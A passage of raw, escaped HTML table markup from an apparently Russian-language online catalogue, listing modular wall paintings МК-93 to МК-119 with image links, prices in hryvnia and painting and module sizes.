20х25</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей: 20х20, 20х40, 20х25</span></td>\r\n							<td style=\"text-align: center; height: 17px;\"><span style=\"text-align: center;\">Разм. модулей: 25х20, 25х55, 25х70, 25х40, 30х25</span></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-117.png\" width=\"258\" height=\"151\" alt=\"мк 117\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-118.png\" width=\"250\" height=\"144\" alt=\"мк 118\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-119.png\" width=\"239\" height=\"140\" alt=\"мк 119\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-117</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-118</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-119</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">215</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">215</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">215</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;81х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;81х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;81х45</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х35, 25х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х35, 25х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х35, 25х35</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-114.png\" width=\"254\" height=\"152\" alt=\"мк 114\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-115.png\" width=\"250\" height=\"149\" alt=\"мк 115\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-116.png\" width=\"236\" height=\"142\" alt=\"мк 116\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-114</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-115</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-116</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">215</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">215</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">215</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;81х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;81х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;81х45</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х35, 25х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х35, 25х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х35, 25х35</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-111.png\" width=\"246\" height=\"96\" alt=\"мк 111\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-112.png\" width=\"247\" height=\"142\" alt=\"мк 112\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-113.png\" width=\"236\" height=\"154\" alt=\"мк 113\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-111</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-112</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-113</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">265</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;112х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;112х60</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;112х68</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х30, 25х30, 25х30, 25х30</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х30, 25х30, 25х30, 25х30</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х30, 25х60, 25х65, 25х25</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-108.png\" width=\"254\" alt=\"мк 108\" height=\"93\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-109.png\" width=\"248\" height=\"98\" alt=\"мк 109\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-110.png\" width=\"243\" height=\"96\" alt=\"мк 110\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-108</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-109</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-110</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">265</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">265</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">265</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;112х35</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;112х38</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;112х38</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х30, 25х30, 25х30, 25х30</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х30, 25х30, 25х30, 25х30</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х30, 25х30, 25х30, 25х30</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-105.png\" alt=\"мк 105\" width=\"253\" height=\"158\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-106.png\" alt=\"мк 106\" width=\"246\" height=\"153\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-107.png\" alt=\"мк 107\" width=\"241\" height=\"151\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-105</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-106</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-107</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. картины (см):&nbsp;110х70</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. картины (см):&nbsp;110х70</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х70&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:&nbsp;25х35, 25х55, 25х70, 25х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х55, 25х70, 25х20&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х25, 25х65, 25х55, 25х35</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-102.png\" alt=\"мк 102\" width=\"253\" height=\"158\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-103.png\" alt=\"мк 103\" width=\"249\" height=\"146\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-104.png\" alt=\"мк 104\" width=\"238\" height=\"149\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-102</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-103</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-104</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х70&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х60&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х70&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х70, 25х55, 25х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х55, 25х45, 25х45</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х55, 25х65, 25х25</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-99.png\" alt=\"мк 99\" width=\"251\" height=\"157\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-100.png\" alt=\"мк 100\" width=\"247\" height=\"154\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-101.png\" alt=\"мк 101\" width=\"238\" height=\"148\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-99</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-100</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-101</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х70&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х70&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х70&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;Разм. модулей:25х35, 25х70, 25х55, 25х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х55, 25х70, 25х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х55, 25х70, 25х20</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-96.png\" alt=\"мк 96\" width=\"254\" height=\"170\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-97.png\" alt=\"мк 97\" width=\"249\" height=\"167\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-98.png\" alt=\"мк 98\" width=\"242\" height=\"152\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-96</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-97</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-98</span></strong></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong><span style=\"font-size: 12pt;\">Цена:&nbsp;<strong><span style=\"font-size: 12pt;\"><em><span style=\"color: #ff0000;\">330</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n								</strong>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х70</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х70</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. картины (см):&nbsp;110х65</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х55, 25х70, 25х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х55, 25х70, 25х20</td>\r\n							<td style=\"text-align: center; height: 17px;\">Разм. модулей:&nbsp;25х35, 25х55, 25х65, 25х25</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n							<td style=\"text-align: center; height: 17px;\">&nbsp;</td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-93.png\" alt=\"мк 93\" width=\"261\" height=\"177\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-94.png\" alt=\"мк 94\" width=\"251\" height=\"142\" /></td>\r\n							<td style=\"text-align: center; height: 17px;\"><img src=\"images/modulnie%20kartini/мк-95.png\" alt=\"мк 95\" width=\"242\" height=\"163\" /></td>\r\n						</tr>\r\n						<tr style=\"height: 17px;\">\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-93</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong style=\"color: #000080;\"><span style=\"font-size: 14pt;\">МК-94</span></strong></td>\r\n							<td style=\"text-align: center; height: 17px;\"><strong 